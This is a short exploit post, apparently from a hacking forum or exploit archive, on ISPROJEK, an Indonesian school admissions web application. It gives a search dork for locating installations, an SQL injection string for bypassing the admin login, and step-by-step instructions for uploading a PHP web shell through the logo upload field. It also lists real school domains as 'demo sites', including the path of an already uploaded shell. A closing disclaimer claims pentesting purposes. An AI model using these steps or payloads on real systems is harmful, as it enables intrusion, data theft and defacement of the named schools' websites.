ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability

[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Author: Negat1ve [+]Team: -1 [+]Goolge Dork: intext:"ISPROJEK" [+]Tested on: Windows 10 x64 ============================================ [+]Proof Of Concept: Find website with the dork Login url will be site.sch.id/path/login.php Login with this detail user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ You can upload your file via 1. Click Setting or you can paste the link /index.php?p=f_editadmin 2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1 3. Fill all the form, then upload your Shell (php extension) in the "File Logo" Your files will go to site.sch.id/path/images/logo/yourshell.php example: https://aplikasi-cbt.com/ppdb/images/logo/captcha.php NB: - filetype of this uploader is php - Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data Demo sites: https://aplikasi-cbt.com/ppdb/login.php https://ma-arrosyidiyah.sch.id/ppdb/login.php https://mtsyppsbandung.com/ppdb/login.php https://masirnamiskin.com/ppdb/login.php

Catatan: Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat, Jika ada masalah jangan pernah menyalakan website ini, Tutor ini di buat hanya untuk mengetest/pentester suatu website apakah web itu memiliki bug apa enggak.

Share this post